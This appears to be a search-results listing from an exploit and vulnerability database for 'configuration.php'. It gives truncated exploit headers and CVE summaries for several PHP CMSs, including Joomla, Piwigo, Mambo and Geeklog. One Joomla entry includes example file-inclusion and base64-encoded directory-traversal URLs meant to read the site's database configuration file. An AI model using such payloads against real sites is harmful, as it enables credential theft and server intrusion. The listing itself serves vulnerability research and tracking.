46 matches found
Joomla! configuration.php file RCE vulnerability
Joomla! is an open source, cross-platform content management system (CMS) developed using PHP and MySQL. An RCE vulnerability exists in the Joomla! configuration.php file. An attacker can exploit the vulnerability to write a one-line web shell (a "one-sentence Trojan") and gain server privileges...
Joomla 3.4.6 Remote Code Execution
Exploit Title: Joomla 3.4.6 - 'configuration.php' Remote Code Execution Google Dork: N/A Date: 2019-10-02 Exploit Author: Alessandro Groppo @Hacktive Security Vendor Homepage: https://www.joomla.it/ Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 Version: 3.0.0 -- 3.4.6 Tested on:...
Joomla 3.4.6 - (configuration.php) Remote Code Execution Exploit
Exploit for php platform in category web applications. Exploit Title: Joomla 3.4.6 - 'configuration.php' Remote Code Execution Google Dork: N/A Date: 2019-10-02 Exploit Author: Alessandro Groppo @Hacktive Security Vendor Homepage: https://www.joomla.it/ Software Link:...
Joomla JS Jobs 1.2.6 Arbitrary File Delete
Exploit Title: Joomla! component comjsjobs 1.2.6 - Arbitrary File Deletion Dork: inurl:"index.php?option=comjsjobs" Date: 2019-08-16 Exploit Author: qw3rTyTy Vendor Homepage: https://www.joomsky.com/ Software Link: https://www.joomsky.com/5/download/1 Version: 1.2.6 Tested on: Debian/nginx/joomla...
CVE-2017-17823
The Configuration component of Piwigo 2.9.2 is vulnerable to SQL Injection via the admin/configuration.php orderby array parameter. An attacker can exploit this to gain access to the data in a connected MySQL database...
Cross-site request forgery (CSRF)
admin/configuration.php in Piwigo 2.9.2 has CSRF...
CVE-2017-17774
admin/configuration.php in Piwigo 2.9.2 has CSRF...
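Joomla! 3.4.6-3.4.x Directory Traversal Vulnerability
Local inclusion: http://www.site.com/components/comdocman/dl2.php?archive=0&file=LDF First use the local file inclusion vulnerability to view the physical path, then, for the configuration.php database configuration file, use a base64 directory traversal payload such as: http://www.site.com/components/comdocman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==...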
Joomla Fsave 2.0 Local File Disclosure
Joomla = fsave Plugin Local File Disclosure Vulnerability My + Author : KnocKout Contact : [email protected] Skype : [email protected] HomePage : http://milw00rm.com -...
Elxis CMS 2009.2 - Remote file include vulnerability
No description provided by source. priasantai.uni.cc | team-elite.us elxis2009.2electrarev2631 === multiple Remote File Include Author : n0n0x Homepage: http://priasantai.uni.cc/ Download script :...
Design/Logic Flaw
Mambo CMS 4.6.5 uses world-readable permissions on configuration.php, which allows local users to obtain the admin password hash by reading the file...
CVE-2013-2563
Mambo CMS 4.6.5 uses world-readable permissions on configuration.php, which allows local users to obtain the admin password hash by reading the file...
CVE-2013-2563
CVE-2013-2563 affects Mambo CMS 4.6.5. The issue is world-readable permissions on configuration.php, enabling local users to read the admin password hash. The connected documents confirm the affected product and the root cause, but do not provide a remediation or exploit details. Action: monitor ...
Cuppa CMS - alertConfigField.php Local/Remote File Inclusion
Cuppa CMS - alertConfigField.php Local/Remote File Inclusion. Exploit Title : Cuppa CMS File Inclusion Date : 4 June 2013 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://www.cuppacms.com/ Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppacms.zip...
Cross-site scripting
Cross-site scripting (XSS) vulnerability in admin/configuration.php in Geeklog before 1.7.1sr1 allows remote attackers to inject arbitrary web script or HTML via the sub_group parameter, a different vulnerability than CVE-2011-4942...
CVE-2011-5159
Geeklog vulnerability in admin/configuration.php before 1.7.1sr1 allows remote XSS via the sub_group parameter. The issue is a distinct variant from CVE-2011-4942 and arises in the sub_group parameter handling, potentially enabling script insertion. Redhat/NVD entries confirm similar ...
CVE-2011-4942
Geeklog's admin/configuration.php is affected by XSS in multiple inputs, (1) sub_group and (2) conf_group, in Geeklog before 1.7.1sr1. The root cause is insufficient input sanitization allowing remote attackers to inject arbitrary HTML/script. Impact is limited to web context and requires user-orig...
CVE-2011-5159
Cross-site scripting (XSS) vulnerability in admin/configuration.php in Geeklog before 1.7.1sr1 allows remote attackers to inject arbitrary web script or HTML via the sub_group parameter, a different vulnerability than CVE-2011-4942...
PHP SQL Server (MSSQL) Query Analyzer Remote Code Execution
Exploit for php platform in category web applications. PHP SQL Server MSSQL Query Analyzer Remote Code Execution. Web-App : PHP SQL Server MSSQL Query...